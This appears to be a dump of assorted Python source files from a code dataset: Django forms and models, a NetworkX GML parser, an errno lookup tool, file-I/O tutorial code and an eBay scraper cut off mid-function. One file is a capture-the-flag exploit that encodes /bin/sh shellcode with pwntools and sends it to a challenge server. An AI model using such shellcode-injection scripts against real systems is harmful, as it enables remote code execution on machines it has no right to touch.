content
stringlengths 0
1.05M
| origin
stringclasses 2
values | type
stringclasses 2
values |
---|---|---|
#! /usr/bin/env python3
from sys import argv
errno = {
'0': 'Success',
'1': 'TooBig',
'2': 'Acces',
'3': 'Addrinuse',
'4': 'Addrnotavail',
'5': 'Afnosupport',
'6': 'Again',
'7': 'Already',
'8': 'Badf',
'9': 'Badmsg',
'10': 'Busy',
'11': 'Canceled',
'12': 'Child',
'13': 'Connaborted',
'14': 'Connrefused',
'15': 'Connreset',
'16': 'Deadlk',
'17': 'Destaddrreq',
'18': 'Dom',
'19': 'Dquot',
'20': 'Exist',
'21': 'Fault',
'22': 'Fbig',
'23': 'Hostunreach',
'24': 'Idrm',
'25': 'Ilseq',
'26': 'Inprogress',
'27': 'Intr',
'28': 'Inval',
'29': 'Io',
'30': 'Isconn',
'31': 'Isdir',
'32': 'Loop',
'33': 'Mfile',
'34': 'Mlink',
'35': 'Msgsize',
'36': 'Multihop',
'37': 'Nametoolong',
'38': 'Netdown',
'39': 'Netreset',
'40': 'Netunreach',
'41': 'Nfile',
'42': 'Nobufs',
'43': 'Nodev',
'44': 'Noent',
'45': 'Noexec',
'46': 'Nolck',
'47': 'Nolink',
'48': 'Nomem',
'49': 'Nomsg',
'50': 'Noprotoopt',
'51': 'Nospc',
'52': 'Nosys',
'53': 'Notconn',
'54': 'Notdir',
'55': 'Notempty',
'56': 'Notrecoverable',
'57': 'Notsock',
'58': 'Notsup',
'59': 'Notty',
'60': 'Nxio',
'61': 'Overflow',
'62': 'Ownerdead',
'63': 'Perm',
'64': 'Pipe',
'65': 'Proto',
'66': 'Protonosupport',
'67': 'Prototype',
'68': 'Range',
'69': 'Rofs',
'70': 'Spipe',
'71': 'Srch',
'72': 'Stale',
'73': 'Timedout',
'74': 'Txtbsy',
'75': 'Xdev',
'76': 'Notcapable',
}
desc = {
'success': 'No error occurred. System call completed successfully.',
'toobig': 'Argument list too long.',
'acces': 'Permission denied.',
'addrinuse': 'Address in use.',
'addrnotavail': 'Address not available.',
'afnosupport': 'Address family not supported.',
'again': 'Resource unavailable, or operation would block.',
'already': 'Connection already in progress.',
'badf': 'Bad file descriptor.',
'badmsg': 'Bad message.',
'busy': 'Device or resource busy.',
'canceled': 'Operation canceled.',
'child': 'No child processes.',
'connaborted': 'Connection aborted.',
'connrefused': 'Connection refused.',
'connreset': 'Connection reset.',
'deadlk': 'Resource deadlock would occur.',
'destaddrreq': 'Destination address required.',
'dom': 'Mathematics argument out of domain of function.',
'dquot': 'Reserved.',
'exist': 'File exists.',
'fault': 'Bad address.',
'fbig': 'File too large.',
'hostunreach': 'Host is unreachable.',
'idrm': 'Identifier removed.',
'ilseq': 'Illegal byte sequence.',
'inprogress': 'Operation in progress.',
'intr': 'Interrupted function.',
'inval': 'Invalid argument.',
'io': 'I/O error.',
'isconn': 'Socket is connected.',
'isdir': 'Is a directory.',
'loop': 'Too many levels of symbolic links.',
'mfile': 'File descriptor value too large.',
'mlink': 'Too many links.',
'msgsize': 'Message too large.',
'multihop': 'Reserved.',
'nametoolong': 'Filename too long.',
'netdown': 'Network is down.',
'netreset': 'Connection aborted by network.',
'netunreach': 'Network unreachable.',
'nfile': 'Too many files open in system.',
'nobufs': 'No buffer space available.',
'nodev': 'No such device.',
'noent': 'No such file or directory.',
'noexec': 'Executable file format error.',
'nolck': 'No locks available.',
'nolink': 'Reserved.',
'nomem': 'Not enough space.',
'nomsg': 'No message of the desired type.',
'noprotoopt': 'Protocol not available.',
'nospc': 'No space left on device.',
'nosys': 'Function not supported.',
'notconn': 'The socket is not connected.',
'notdir': 'Not a directory or a symbolic link to a directory.',
'notempty': 'Directory not empty.',
'notrecoverable': 'State not recoverable.',
'notsock': 'Not a socket.',
'notsup': 'Not supported, or operation not supported on socket.',
'notty': 'Inappropriate I/O control operation.',
'nxio': 'No such device or address.',
'overflow': 'Value too large to be stored in data type.',
'ownerdead': 'Previous owner died.',
'perm': 'Operation not permitted.',
'pipe': 'Broken pipe.',
'proto': 'Protocol error.',
'protonosupport': 'Protocol not supported.',
'prototype': 'Protocol wrong type for socket.',
'range': 'Result too large.',
'rofs': 'Read-only file system.',
'spipe': 'Invalid seek.',
'srch': 'No such process.',
'stale': 'Reserved.',
'timedout': 'Connection timed out.',
'txtbsy': 'Text file busy.',
'xdev': 'Cross-device link.',
'notcapable': 'Extension: Capabilities insufficient.',
}
if __name__ == '__main__':
if len(argv) == 1:
print(f"Usage: {argv[0]} errno ...")
else:
for arg in argv[1:]:
if arg in errno:
print(f"{arg}: {errno[arg]} -- {desc[errno[arg].lower()]}")
else:
print(f"{arg}: ***UNKNOWN ERROR NUMBER***")
|
nilq/baby-python
|
python
|
"""
Read graphs in GML format.
"GML, the G>raph Modelling Language, is our proposal for a portable
file format for graphs. GML's key features are portability, simple
syntax, extensibility and flexibility. A GML file consists of a
hierarchical key-value lists. Graphs can be annotated with arbitrary
data structures. The idea for a common file format was born at the
GD'95; this proposal is the outcome of many discussions. GML is the
standard file format in the Graphlet graph editor system. It has been
overtaken and adapted by several other systems for drawing graphs."
See http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html
Requires pyparsing: http://pyparsing.wikispaces.com/
Format
------
See http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html
for format specification.
Example graphs in GML format:
http://www-personal.umich.edu/~mejn/netdata/
"""
__author__ = """Aric Hagberg (hagberg@lanl.gov)"""
# Copyright (C) 2008-2010 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
__all__ = ['read_gml', 'parse_gml', 'generate_gml', 'write_gml']
import networkx as nx
from networkx.exception import NetworkXError
from networkx.utils import is_string_like, open_file
@open_file(0,mode='rb')
def read_gml(path,encoding='UTF-8',relabel=False):
"""Read graph in GML format from path.
Parameters
----------
path : filename or filehandle
The filename or filehandle to read from.
encoding : string, optional
Text encoding.
relabel : bool, optional
If True use the GML node label attribute for node names otherwise use
the node id.
Returns
-------
G : MultiGraph or MultiDiGraph
Raises
------
ImportError
If the pyparsing module is not available.
See Also
--------
write_gml, parse_gml
Notes
-----
Requires pyparsing: http://pyparsing.wikispaces.com/
References
----------
GML specification:
http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html
Examples
--------
>>> G=nx.path_graph(4)
>>> nx.write_gml(G,'test.gml')
>>> H=nx.read_gml('test.gml')
"""
lines=(line.decode(encoding) for line in path)
G=parse_gml(lines,relabel=relabel)
return G
def parse_gml(lines, relabel=True):
"""Parse GML graph from a string or iterable.
Parameters
----------
lines : string or iterable
Data in GML format.
relabel : bool, optional
If True use the GML node label attribute for node names otherwise use
the node id.
Returns
-------
G : MultiGraph or MultiDiGraph
Raises
------
ImportError
If the pyparsing module is not available.
See Also
--------
write_gml, read_gml
Notes
-----
This stores nested GML attributes as dictionaries in the
NetworkX graph, node, and edge attribute structures.
Requires pyparsing: http://pyparsing.wikispaces.com/
References
----------
GML specification:
http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html
"""
try:
from pyparsing import ParseException
except ImportError:
try:
from matplotlib.pyparsing import ParseException
except:
raise ImportError('Import Error: not able to import pyparsing:',
'http://pyparsing.wikispaces.com/')
try:
data = "".join(lines)
gml = pyparse_gml()
tokens =gml.parseString(data)
except ParseException as err:
print((err.line))
print((" "*(err.column-1) + "^"))
print(err)
raise
# function to recursively make dicts of key/value pairs
def wrap(tok):
listtype=type(tok)
result={}
for k,v in tok:
if type(v)==listtype:
result[str(k)]=wrap(v)
else:
result[str(k)]=v
return result
# Set flag
multigraph=False
# but assume multigraphs to start
if tokens.directed==1:
G=nx.MultiDiGraph()
else:
G=nx.MultiGraph()
for k,v in tokens.asList():
if k=="node":
vdict=wrap(v)
node=vdict['id']
G.add_node(node,attr_dict=vdict)
elif k=="edge":
vdict=wrap(v)
source=vdict.pop('source')
target=vdict.pop('target')
if G.has_edge(source,target):
multigraph=True
G.add_edge(source,target,attr_dict=vdict)
else:
G.graph[k]=v
# switch to Graph or DiGraph if no parallel edges were found.
if not multigraph:
if G.is_directed():
G=nx.DiGraph(G)
else:
G=nx.Graph(G)
if relabel:
# relabel, but check for duplicate labels first
mapping=[(n,d['label']) for n,d in G.node.items()]
x,y=zip(*mapping)
if len(set(y))!=len(G):
raise NetworkXError('Failed to relabel nodes: '
'duplicate node labels found. '
'Use relabel=False.')
G=nx.relabel_nodes(G,dict(mapping))
return G
def pyparse_gml():
"""A pyparsing tokenizer for GML graph format.
This is not intended to be called directly.
See Also
--------
write_gml, read_gml, parse_gml
"""
try:
from pyparsing import \
Literal, CaselessLiteral, Word, Forward,\
ZeroOrMore, Group, Dict, Optional, Combine,\
ParseException, restOfLine, White, alphas, alphanums, nums,\
OneOrMore,quotedString,removeQuotes,dblQuotedString, Regex
except ImportError:
try:
from matplotlib.pyparsing import \
Literal, CaselessLiteral, Word, Forward,\
ZeroOrMore, Group, Dict, Optional, Combine,\
ParseException, restOfLine, White, alphas, alphanums, nums,\
OneOrMore,quotedString,removeQuotes,dblQuotedString, Regex
except:
raise ImportError('pyparsing not found',
'http://pyparsing.wikispaces.com/')
lbrack = Literal("[").suppress()
rbrack = Literal("]").suppress()
pound = ("#")
comment = pound + Optional( restOfLine )
integer = Word(nums+'-').setParseAction(lambda s,l,t:[ int(t[0])])
real = Regex(r"[+-]?\d+\.\d*([eE][+-]?\d+)?").setParseAction(
lambda s,l,t:[ float(t[0]) ])
dblQuotedString.setParseAction( removeQuotes )
key = Word(alphas,alphanums+'_')
value_atom = (real | integer | Word(alphanums) | dblQuotedString)
value = Forward() # to be defined later with << operator
keyvalue = Group(key+value)
value << (value_atom | Group( lbrack + ZeroOrMore(keyvalue) + rbrack ))
node = Group(Literal("node") + lbrack + Group(OneOrMore(keyvalue)) + rbrack)
edge = Group(Literal("edge") + lbrack + Group(OneOrMore(keyvalue)) + rbrack)
creator = Group(Literal("Creator")+ Optional( restOfLine ))
version = Group(Literal("Version")+ Optional( restOfLine ))
graphkey = Literal("graph").suppress()
graph = Dict (Optional(creator)+Optional(version)+\
graphkey + lbrack + ZeroOrMore( (node|edge|keyvalue) ) + rbrack )
graph.ignore(comment)
return graph
def generate_gml(G):
"""Generate a single entry of the graph G in GML format.
Parameters
----------
G : NetworkX graph
Returns
-------
lines: string
Lines in GML format.
Notes
-----
This implementation does not support all Python data types as GML
data. Nodes, node attributes, edge attributes, and graph
attributes must be either dictionaries or single stings or
numbers. If they are not an attempt is made to represent them as
strings. For example, a list as edge data
G[1][2]['somedata']=[1,2,3], will be represented in the GML file
as::
edge [
source 1
target 2
somedata "[1, 2, 3]"
]
"""
# recursively make dicts into gml brackets
def listify(d,indent,indentlevel):
result='[ \n'
for k,v in d.items():
if type(v)==dict:
v=listify(v,indent,indentlevel+1)
result += indentlevel*indent+"%s %s\n"%(k,v)
return result+indentlevel*indent+"]"
def string_item(k,v,indent):
# try to make a string of the data
if type(v)==dict:
v=listify(v,indent,2)
elif is_string_like(v):
v='"%s"'%v
elif type(v)==bool:
v=int(v)
return "%s %s"%(k,v)
# check for attributes or assign empty dict
if hasattr(G,'graph_attr'):
graph_attr=G.graph_attr
else:
graph_attr={}
if hasattr(G,'node_attr'):
node_attr=G.node_attr
else:
node_attr={}
indent=2*' '
count=iter(range(len(G)))
node_id={}
yield "graph ["
if G.is_directed():
yield indent+"directed 1"
# write graph attributes
for k,v in G.graph.items():
yield indent+string_item(k,v,indent)
# write nodes
for n in G:
yield indent+"node ["
# get id or assign number
nid=G.node[n].get('id',next(count))
node_id[n]=nid
yield 2*indent+"id %s"%nid
label=G.node[n].pop('label',n)
if is_string_like(label):
label='"%s"'%label
yield 2*indent+'label %s'%label
if n in G:
for k,v in G.node[n].items():
if k=='id': continue
yield 2*indent+string_item(k,v,indent)
yield indent+"]"
# write edges
for u,v,edgedata in G.edges_iter(data=True):
yield indent+"edge ["
yield 2*indent+"source %s"%node_id[u]
yield 2*indent+"target %s"%node_id[v]
for k,v in edgedata.items():
if k=='source': continue
if k=='target': continue
yield 2*indent+string_item(k,v,indent)
yield indent+"]"
yield "]"
@open_file(1,mode='wb')
def write_gml(G, path):
"""
Write the graph G in GML format to the file or file handle path.
Parameters
----------
path : filename or filehandle
The filename or filehandle to write. Filenames ending in
.gz or .gz2 will be compressed.
See Also
--------
read_gml, parse_gml
Notes
-----
GML specifications indicate that the file should only use
7bit ASCII text encoding.iso8859-1 (latin-1).
This implementation does not support all Python data types as GML
data. Nodes, node attributes, edge attributes, and graph
attributes must be either dictionaries or single stings or
numbers. If they are not an attempt is made to represent them as
strings. For example, a list as edge data
G[1][2]['somedata']=[1,2,3], will be represented in the GML file
as::
edge [
source 1
target 2
somedata "[1, 2, 3]"
]
Examples
---------
>>> G=nx.path_graph(4)
>>> nx.write_gml(G,"test.gml")
Filenames ending in .gz or .bz2 will be compressed.
>>> nx.write_gml(G,"test.gml.gz")
"""
for line in generate_gml(G):
line+='\n'
path.write(line.encode('latin-1'))
# fixture for nose tests
def setup_module(module):
from nose import SkipTest
try:
import pyparsing
except:
try:
import matplotlib.pyparsing
except:
raise SkipTest("pyparsing not available")
# fixture for nose tests
def teardown_module(module):
import os
os.unlink('test.gml')
os.unlink('test.gml.gz')
|
nilq/baby-python
|
python
|
# py2.7 and py3 compatibility imports
from __future__ import absolute_import
from __future__ import unicode_literals
from django.conf.urls import url, include
from rest_framework import routers
from . import views
router = routers.DefaultRouter()
router.register(r'shadowsocks/config', views.ConfigViewSet)
router.register(r'shadowsocks/account', views.AccountViewSet)
router.register(r'shadowsocks/node', views.NodeViewSet)
router.register(r'shadowsocks/nodeaccount', views.NodeAccountViewSet)
router.register(r'shadowsocks/ssmanager', views.SSManagerViewSet)
urlpatterns = [
url(r'^', include(router.urls)),
]
|
nilq/baby-python
|
python
|
'''
Working with files in Python
'''
# reading and writing files
path_to_file = '00 - Very Basics/text_files/'
file_name1 = input('What is the file name you want to write to? ')
try:
file1 = open('{}/{}.txt'.format(path_to_file, file_name1), 'w')
file1.write('''
You don't know how to be a man
I open myself, you close me,
I want to run, but you catch me again,
I want to cry out, you tell me to shut up,
Why do I do it?
I throw myself, like a child
I listen to you, pleasant, humble
Why do I do it?
Why don't I leave, why do I settle?
I gave you power over me,
I am strong but not this way, but not now
When do I have to say it;
How do I say it to you?
You don't know how to be a man
For a girl.
You didn't even try,
Not even once.
My argument is mute,
It's just for me.
You don't know how to be a man
And nobody teaches you how.
''')
file1.close()
except FileNotFoundError as error:
print(error)
else:
print('Text file was correctelly created/written.')
file_name2 = input('What is the file name you want to read from? ')
try:
file2 = open('{}/{}.txt'.format(path_to_file, file_name2), 'r')
print(file2.read())
file2.close()
except FileNotFoundError as error:
print(error)
else:
print('File was read correctelly.')
print(file1.closed)
print(file2.closed)
try:
with open('{}/{}.txt'.format(path_to_file, file_name2)) as myFile:
print(myFile.read())
except FileNotFoundError as error:
print(error)
songs = [
'Visele',
'Iubirea noastra muta',
'Da\' ce tu',
'Haina ta',
'Ce s-a intamplat cu noi',
'My Favourite Man',
'Bandana',
'Bolnavi amandoi',
'Cosmos',
'Octombrie Rosu',
'Eroii pieselor noastre',
'Beau',
'In locul meu',
'Cel mai bun prieten',
'Nu stii tu sa fii barbat'
]
try:
with open('{}/{}'.format(path_to_file, 'irina_rimes_songs.txt'), 'w') as songs_file:
for song in songs:
songs_file.write('{}\n'.format(song))
except FileNotFoundError as error:
print(error)
try:
with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt'), 'w') as songs_file:
for song in songs:
songs_file.writelines('%s\n'%song)
except FileNotFoundError as error:
print(error)
with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt')) as songs_file:
print(songs_file.readline(10))
print(songs_file.tell())
print(songs_file.readlines())
with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt')) as songs_file:
print(songs_file.tell())
songs_file.seek(10, 0)
print(songs_file.tell())
print(songs_file.read(15))
print(songs_file.tell())
with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt'), 'r+') as songs_file:
songs_file.seek(0, 2)
print(songs_file.tell())
songs_file.write('Hello')
# os module
import os
print(os.getcwd())
# print(os.get_exec_path())
try:
os.mkdir('nice_folder')
except Exception:
pass
print(os.path.isdir('nice_folder'))
try:
os.rename('nice_folder', 'ugly_folder')
except Exception:
pass
print(os.path.isdir('nice_folder'))
try:
os.remove('ugly_folder')
except Exception as error:
print(error)
|
nilq/baby-python
|
python
|
from django.contrib.auth import get_user_model
from django.db import models, transaction
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from libs.models import BaseModel
User = get_user_model()
class State(BaseModel):
name = models.CharField(verbose_name=_('name'), max_length=80)
def __str__(self):
return self.name
class Meta:
verbose_name = _('State')
verbose_name_plural = _('States')
db_table = 'state'
class City(BaseModel):
name = models.CharField(verbose_name=_('name'), max_length=80)
state = models.ForeignKey(State, related_name='cities', on_delete=models.CASCADE, verbose_name=_('state'))
def __str__(self):
return f'{self.name} - {self.state}'
class Meta:
verbose_name = _('City')
verbose_name_plural = _('Cities')
db_table = 'city'
class AirLine(BaseModel):
name = models.CharField(verbose_name=_('name'), max_length=80)
def __str__(self):
return self.name
class Meta:
verbose_name = _('Air Line')
verbose_name_plural = _('Air Lines')
db_table = 'airline'
class Plane(BaseModel):
name = models.CharField(verbose_name=_('name'), max_length=50)
airline = models.ForeignKey(AirLine, related_name='planes', on_delete=models.CASCADE, verbose_name=_('air line'))
capacity = models.PositiveSmallIntegerField(verbose_name=_('capacity'))
def __str__(self):
return f'{self.name} - {self.airline} - {self.capacity}'
class Meta:
verbose_name = _('Plane')
verbose_name_plural = _('Planes')
db_table = 'plane'
class Flight(BaseModel):
flight_number = models.CharField(max_length=150, verbose_name=_('flight number'))
plane = models.ForeignKey(Plane, related_name='flights', on_delete=models.CASCADE, verbose_name=_('plane'))
from_city = models.ForeignKey(
City,
related_name='origin_flights',
on_delete=models.CASCADE,
verbose_name=_('origin')
)
to_city = models.ForeignKey(
City,
related_name='destination_flights',
on_delete=models.CASCADE,
verbose_name=_('destination')
)
depart_datetime = models.DateTimeField(verbose_name=_('depart datetime'))
arrive_datetime = models.DateTimeField(verbose_name=_('modified time'))
price = models.IntegerField(verbose_name=_('price'))
def prototype_create_seats(self):
for c in range(1, self.plane.capacity + 1):
FlightSeat.objects.create(flight=self, seat=Seat.objects.create(number=c))
def available_flight_depart_datetime(self):
return bool(self.depart_datetime > timezone.now())
def __str__(self):
return self.flight_number
class Meta:
verbose_name = _('Flight')
verbose_name_plural = _('Flights')
db_table = 'flight'
class Seat(BaseModel):
number = models.PositiveSmallIntegerField(verbose_name=_('number'))
is_reserve = models.BooleanField(verbose_name=_('is reserve'), default=False)
reserved_time = models.DateTimeField(default=None, null=True, blank=True)
def __str__(self):
return f'{self.number} - {self.is_reserve}'
class Meta:
verbose_name = _('Seat')
verbose_name_plural = _('Seats')
db_table = 'seat'
class FlightSeat(BaseModel):
flight = models.ForeignKey(Flight, related_name='flight_seats', on_delete=models.CASCADE, verbose_name=_('flight'))
seat = models.ForeignKey(Seat, related_name='flight_seats', on_delete=models.CASCADE, verbose_name=_('seat'))
customer = models.ForeignKey(
User,
related_name='flight_seats',
on_delete=models.CASCADE,
verbose_name=_('customer'),
null=True, blank=True
)
def __str__(self):
return f'{self.id}'
def available_flight_seat(self):
return bool(self.customer is None and not self.seat.is_reserve)
class Meta:
verbose_name = _('Flight Seat')
verbose_name_plural = _('Flight Seats')
db_table = 'flight_seat'
|
nilq/baby-python
|
python
|
from .contract import Contract # noqa
from .template import Template, TemplateError # noqa
from .asyncio.contract import AsyncContract # noqa
from .asyncio.template import AsyncTemplate # noqa
__all__ = (
"Contract",
"Template",
"TemplateError",
"AsyncContract",
"AsyncTemplate"
)
__version__ = '0.0.4'
|
nilq/baby-python
|
python
|
# Generated by Django 2.2.9 on 2020-02-12 10:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('events', '0075_change_place_srid'),
]
operations = [
migrations.AlterField(
model_name='image',
name='license',
field=models.ForeignKey(default='event_only', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='images', to='events.License', verbose_name='License'),
),
]
|
nilq/baby-python
|
python
|
import memcache
import simplejson
class SimplejsonWrapper(object):
def __init__(self, file, protocol=None):
self.file = file
def dump(self, value)
simplejson.dump(value, self.file)
def load(self):
return simplejson.load(self.file)
cache = memcache.Client(['127.0.0.1:11211'], pickler=SimplejsonWrapper, unpickler=SimplejsonWrapper)
|
nilq/baby-python
|
python
|
from pwn import *
context.binary = elf = ELF("shellcoded")
r = remote("challenge.ctf.games", 32175)
# shellcode from pwn library
shellcode = list(asm(shellcraft.sh()))
# manually find shellcode online
#shellcode = list(b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05')
modified_sc = []
# reverse the action done by the binary
for i in range(len(shellcode)):
if i & 1 != 0:
v3 = 1
else:
v3 = -1
# 1. '& 0xFF': brings negative int back to unsigned byte convertible range
# 2. byte-order: little since arch is amd-64-little
# 3. byte code shld be unsigned, since adding or subtracting from the original compiled shell code
# will result in unsigned overflow if not within range 0 to 0xff, which brings it back to the original bytecode in the shellcode
modified_sc.append(((shellcode[i] + (v3 * i))&0xFF).to_bytes(1, byteorder = 'little', signed = False))
str_sc = b''.join(modified_sc)
# payload
print(str_sc)
r.sendline(str_sc)
r.interactive()
# flag{f27646ae277113d24c73dbc66a816721}
|
nilq/baby-python
|
python
|
from kNUI.main import run
|
nilq/baby-python
|
python
|
token = "your new token here"
|
nilq/baby-python
|
python
|
from django import forms
from django.contrib.auth import authenticate
from django.contrib.auth.forms import PasswordResetForm, SetPasswordForm
from django.core.validators import MinLengthValidator
from django.db.models import Q
from django.contrib.auth.models import User
from social_django.views import complete
from accounts.models import Instructor
class UserForm(forms.ModelForm):
"""
This form allow user to edit his profile.
On profile page there are a couple of forms with required fields.
Field form_id is here to check what form was submitted.
In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it.
If form_id not found in request.POST we will not validate this form.
"""
form_id = forms.CharField(max_length=255, initial='user_form', widget=forms.HiddenInput())
class Meta:
model = User
fields = ('form_id', 'first_name', 'last_name')
widgets = {
'id': forms.HiddenInput(),
'form_id': forms.HiddenInput(),
}
class ChangeEmailForm(forms.Form):
"""
Field form_id is here to check what form was submitted.
In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it.
If form_id not found in request.POST we will not validate this form.
"""
form_id = forms.CharField(max_length=255, initial='email_form', widget=forms.HiddenInput())
email = forms.EmailField()
def clean_email(self):
email = self.cleaned_data['email']
my_email = self.initial['email']
if 'email' in self.changed_data:
already_taken = User.objects.filter(
Q(email=email) | Q(secondary__email=email)
).exclude(email=my_email)
if already_taken:
raise forms.ValidationError('This email already taken.')
return email
def save(self, request, commit=True):
"""
This form calls to `complete` function of python-social-auth.
Send email to the user with confirmation link when user changes his email.
:param request: django request
:param commit: save to db or not?
:return:
"""
if self.initial['email'] != self.cleaned_data['email']:
return complete(request, 'email', force_update=True)
class InstructorForm(forms.ModelForm):
"""
Field form_id is here to check what form was submitted.
In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it.
If form_id not found in request.POST we will not validate this form.
"""
form_id = forms.CharField(max_length=255, initial='instructor_form', widget=forms.HiddenInput())
class Meta:
model = Instructor
fields = ('form_id', 'user', 'institution')
widgets = {
'user': forms.HiddenInput(),
'form_id': forms.HiddenInput(),
}
class CreatePasswordForm(forms.ModelForm):
"""This form will be used in case when user has no password and wants to create it."""
form_id = forms.CharField(max_length=255, initial='password_form', widget=forms.HiddenInput())
confirm_password = forms.CharField(max_length=255, widget=forms.PasswordInput(), validators=[MinLengthValidator(6)])
password = forms.CharField(max_length=255, widget=forms.PasswordInput(), validators=[MinLengthValidator(6)])
def clean(self):
data = self.cleaned_data
if data.get('password') != data.get('confirm_password'):
self.add_error(None, 'Password and Confirm password fields doesn\'t match.')
raise forms.ValidationError(
{'password': 'Should be equal to confirm password field.',
'confirm_password': 'Should be equal to password field.'})
return self.cleaned_data
class Meta:
model = User
fields = ('password', 'confirm_password', 'form_id')
def save(self, commit=True):
self.instance.set_password(self.cleaned_data['password'])
if commit:
self.instance.save()
return self.instance
class ChangePasswordForm(CreatePasswordForm):
"""
Field form_id is here to check what form was submitted.
In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it.
If form_id not found in request.POST we will not validate this form.
"""
current_password = forms.CharField(max_length=255, widget=forms.PasswordInput())
def clean(self):
data = self.cleaned_data
if data.get('password') != data.get('confirm_password'):
self.add_error('password', 'Should be equal to confirm password field.')
self.add_error('confirm_password', 'Should be equal to password field.')
self.add_error(None, 'Password and Confirm password fields doesn\'t match.')
return self.cleaned_data
def clean_current_password(self):
current_pw = self.cleaned_data.get('current_password')
user = authenticate(username=self.instance, password=current_pw)
if user is None:
self.add_error('current_password', 'Provided current password doesn\'t match your password')
return current_pw
class Meta:
model = User
fields = ('current_password', 'password', 'confirm_password', 'form_id')
class DeleteAccountForm(forms.ModelForm):
"""
Field form_id is here to check what form was submitted.
In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it.
If form_id not found in request.POST we will not validate this form.
"""
form_id = forms.CharField(max_length=255, initial='delete_account_form', widget=forms.HiddenInput())
confirm_delete_account = forms.BooleanField(
required=True,
widget=forms.HiddenInput(),
initial=False
)
def save(self, commit=True):
self.instance.is_active = False
if commit:
self.instance.save()
return self.instance
class Meta:
model = User
fields = ('form_id', 'confirm_delete_account')
widgets = {
'id': forms.HiddenInput(),
}
class CustomPasswordResetForm(PasswordResetForm):
"""
Field form_id is here to check what form was submitted.
In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it.
If form_id not found in request.POST we will not validate this form.
"""
def clean_email(self):
user = User.objects.filter(email=self.cleaned_data['email']).first()
if not user:
raise forms.ValidationError('No registered account with such email.')
if not user.has_usable_password():
raise forms.ValidationError(
'User with this email does not have password, more likely you registered via social network')
return self.cleaned_data['email']
class SocialForm(forms.ModelForm):
institution = forms.CharField(required=True)
what_do_you_teach = forms.CharField(required=True)
class Meta:
model = Instructor
fields = (
'user',
'institution',
'what_do_you_teach'
)
widgets = {
'user': forms.HiddenInput(),
}
class CustomSetPasswordForm(SetPasswordForm):
def __init__(self, user, *args, **kwargs):
super(CustomSetPasswordForm, self).__init__(user, *args, **kwargs)
self.fields['new_password1'].validators.append(MinLengthValidator(6))
self.fields['new_password2'].validators.append(MinLengthValidator(6))
|
nilq/baby-python
|
python
|
import unittest
from mock import patch, MagicMock
from rawes.elastic import Elastic
from requests.models import Response
from rawes.http_connection import HttpConnection
class TestConnectionPooling(unittest.TestCase):
"""Connection pooling was added on top of Rawes, it wasn't designed from
the beggingin. We need some tests to ensure our expectations of the
connection pooling are met.
"""
def testBasicRoundRobin(self):
""" Set up a client with three different hosts to connect to, make
multiple calls and check that each call goes on a different host in a
Round Robin fashion
"""
hosts = ['http://someserver1:9200', 'http://someserver2:9200',
'http://someserver3:9200']
es = Elastic(hosts, connection_pool_kwargs={'dead_timeout': 10})
with patch('rawes.http_connection.requests.Session.request',
MagicMock(return_value=None)) as request:
request.return_value = Response()
called = []
for _ in xrange(len(hosts)):
es.get()
# Save a list of called hosts (and remove trailing /)
called.append(request.call_args[0][1][:-1])
# Check against original hosts list
self.assertSetEqual(set(hosts), set(called),
'All hosts in coonnection pool should be used')
called_again = []
for _ in xrange(len(hosts)):
es.get()
# Call the same hosts again (don't forget about the trailing /)
called_again.append(request.call_args[0][1][:-1])
# Check they were called in the same order as before
self.assertListEqual(called, called_again,
'Round robin order wasn\'t preserved')
|
nilq/baby-python
|
python
|
import os.path
__all__ = [
"__name__", "__summary__", "__url__", "__version__",
"__author__", "__email__", "__license__"
]
try:
base_dir = os.path.dirname(os.path.abspath(__file__))
except NameError:
base_dir = None
__title__ = "makebib"
__summary__ = "A simple script to generate a local bib file from a central database."
__url__ = 'https://gitlab.com/Verner/makebib'
__version__ = "0.2.2"
__author__ = "Jonathan L. Verner"
__email__ = "jonathan@temno.eu"
__license__ = "MIT"
|
nilq/baby-python
|
python
|
import json
import os
import sys
import logging
import traceback
import re
import boto3
import time
# helper functions
from queue_wrapper import *
from message_wrapper import *
# packages for listing to ebay
from ebaysdk.trading import Connection
# packages for the item info formatter
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
sqs = boto3.resource('sqs')
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(logging.INFO)
# Setting chrome options for our browser
user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.50 Safari/537.36'
chrome_options = Options()
# chrome_options.add_argument("--disable-extensions")
chrome_options.add_argument("--disable-gpu")
# chrome_options.add_argument("--no-sandbox") # linux only
chrome_options.add_argument("--headless")
chrome_options.add_argument(f'user-agent={user_agent}')
# chrome_options.add_argument("start-maximized")
# chrome_options.add_argument("disable-infobars")
def strip_text(string, rejoin_str=False):
"""removes all punctuation and from the string and returns comma separated list
<div class="price" data-auto="main-price"> Orig. $190.00 </div>
-> ['Orig', '190', '00']
rejion_str == True -> Orig 190 00
:param string -> string containing alphanumeric characters to be split into words
"""
split_words = re.findall(r"[\w']+", string)
# if we want to make the string into a sentence again
if rejoin_str:
# join the words together with spaces in each of them
return " ".join(split_words)
# return the original words split into a list
return split_words
def get_macys_item_info(soup):
"""return the needed json/dictionary of a macys item in order to post it to eBay
:param soup: BeautifulSoup() instance
"""
item_details = {}
# TITLE
